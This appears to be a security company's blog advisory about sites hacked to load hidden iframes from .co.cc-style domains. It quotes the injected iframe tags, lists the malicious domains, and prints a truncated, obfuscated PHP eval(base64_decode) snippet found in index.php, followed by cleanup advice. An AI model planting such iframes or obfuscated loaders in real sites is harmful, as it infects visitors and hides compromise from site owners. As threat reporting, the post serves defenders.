The attack from the .cc’s domains

Over the last few days we’ve continued to see a large increase in the number of sites hacked and infected with a malicious iframe from .co.cc (.vv.cc, .cz.cc, etc) domains.

You can run a free scan using SiteCheck to see if you’ve been infected.

That’s how it looks like on a hacked site:

<iframe src="http://hgerwhu45.co.cc/QQkFBg0AAQ..=" width=”1″ height=”1″>

or

<iframe src="http://gqgqhfdjdh.co.cc/QQkFBg0AAQ..==" width=’1` height=`1″>

The number of domains being used in this attack is quite big and only a few of them are blacklisted by Google, but we already identified those at least:

berfry43bgrbf.vv.cc
burifym.cz.cc
drelagda.vv.cc
g243gtdsgsdg.vv.cc
glkgj5j4rshdfhj.vv.cc
gqgqhfdjdh.co.cc
gs34grsgdg.vv.cc
gsdg3gsdgsdg.vv.cc
gsg3gsdgsxgsdg.vv.cc
gwsg3gsgdsgd.vv.cc
hdsh4hsfhdsj.vv.cc
hgerwhu45.co.cc
hndfdfnfdnxdnf.vv.cc
jfgdhdfhsdfh.vv.cc
jfgjfr5jdfj.vv.cc
keleghma.vv.cc
kulawield.vv.cc
maridora.vv.cc
miraswyn.cz.cc
mkgk5jswhgfnxg.vv.cc
oghmalak.vv.cc
siranaya.vv.cc
lookfeel-201101.co.cc

They change quite often, but on a hacked site, the sign is the same: Redirecting to .cc malicious sites and the following PHP code added to the index.php (among with other backdoors):

<?php eval ( base64_decode("ZXJyb3JfcmV.wb3J0aW5nKDApOw0KJGJv.dCA9IEZBTFNFIDsNC…
c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGl…
kYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW…
5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJ…

The decoded malware is available here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=d08451989a742658b8e5a8c4a3788d88

Here’s our malware definition for it: http://sucuri.net/malware/malware-entry-mwjs488

Cleaning up:

Cleaning up is not very hard, you have to remove the malicious code above from your index.php files, upgrade WordPress (Joomla, osCommerce or whatever web application you are using), change all the passwords and check for backdoors (files that you didn’t add). If you need help doing that (or need someone to do it for you), we offer web site malware removal / clean up services

We will post more details /updates as we learn more.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.